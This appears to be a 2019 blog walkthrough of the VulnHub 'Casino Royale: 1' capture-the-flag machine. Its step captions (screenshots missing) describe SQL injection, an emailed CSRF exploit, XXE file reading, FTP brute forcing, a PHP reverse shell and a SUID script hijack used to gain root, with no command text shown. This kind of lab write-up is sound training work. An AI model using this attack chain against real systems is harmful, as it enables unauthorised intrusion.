Casino Royale: 1

[ vulnhub  ctf  walkthrough  ]

Goal

root

Download

https://www.vulnhub.com/entry/casino-royale-1,287/

Walkthrough

nmap
alt text

default 80
alt text

default 8081
alt text

nothing happens after post
alt text

dirb shows some interesting directors
alt text

cards…nothing
alt text

kboard…nothing
alt text

robots is cards and kboard…lol
alt text

trying index.php reveals a pokermax software
alt text

we find an admin page, but default checks don’t work
alt text

we move to sqlmap
alt text

sqlmap success and we find the admin password
alt text

pokermax admin logged in
alt text

looking around, user valenka has some info in the profile
alt text

update /etc/hosts and browse to url, it’s a cms
alt text

going through the posts, this one looks interesting seeing how port 25 is open
alt text

quick search on e-db reveals a csrf attack that looks like it could work https://www.exploit-db.com/exploits/35301

setup the csrf file and hosted on attacking machine through apache
alt text

setup for the email took some time trying to figure out the correct subject line, had to go one by one through the poker clients
alt text

final send email with a link to the csrf file
alt text

access log shows file is checked!
alt text

attempt to sign-in with creds provided in csrf file
alt text

success! in as admin
alt text

wasted a lot of time looking for places to add php code, ends up there were details in a user profile again
alt text

browsing to the new url, it’s a file directoy
alt text

browsing to main.php, nothing special
alt text

but we find interesting notes in the source
alt text

looks like xxe vuln and here is a good post to follow https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection

setup xml.txt and curl command
alt text

running reveals /etc/passwd
alt text

now we have users, know that ftp is open and from the comment in the ultra source that it’s an easy password. throw hydra at it…success
alt text

ftp access is successful, however we cannot do much. cannot upload, but can make directories
alt text

after some playing around, we can upload just without extensions :)
alt text

however we cannot add .php extension, but .php5 worked
alt text

we setup our netcat listener and browse to the file, but nothing happens. looking we need to add permissions to the file, we just 777 it
alt text

we revisit the file in the browser and we have a reverse shell
alt text

quickly find valenka password for mysql
alt text

able to elevate to user valenka after breaking out of jail. after much searching, elevation didn’t help though
alt text

back as www-data, searched and found an interesting suid file and directory
alt text

running the suid file it seems it’s pulling network stats and processes, most likely using run.sh
alt text

from here we need to become user le, so we look at some of the files being served by the webserver. it shows index.html calls collect.php
alt text

we see it’s calling the python script and we see it’s editable by www-data. it’s currently reading a log file, but perhaps we can change that to a reverse shell?
alt text

we know we can access these files via that 8081 port. looking more closely we see that the web server at this port is run by user le
alt text

first let’s create the new python script containing our reverse shell
alt text

next we download the file to /tmp
alt text

then we echo that file into the existing python script and overwrite the contents. we do a cat to verfiy as well
alt text

we setup a netcat listener on the new port, browse site and trigger the python script…we have a reverse shell as user le!!
alt text

so now back to the run.sh file, we take a look and we see it’s just netstat and ps commands
alt text

well we own the file, let’s chmod and append a /bin/sh
alt text

with that let’s run mi6…and we root
alt text

moving to /root/flag folder we see a script flag.sh, which when run tells us to open to a url
alt text

nice
alt text

Written on February 26, 2019
Share on: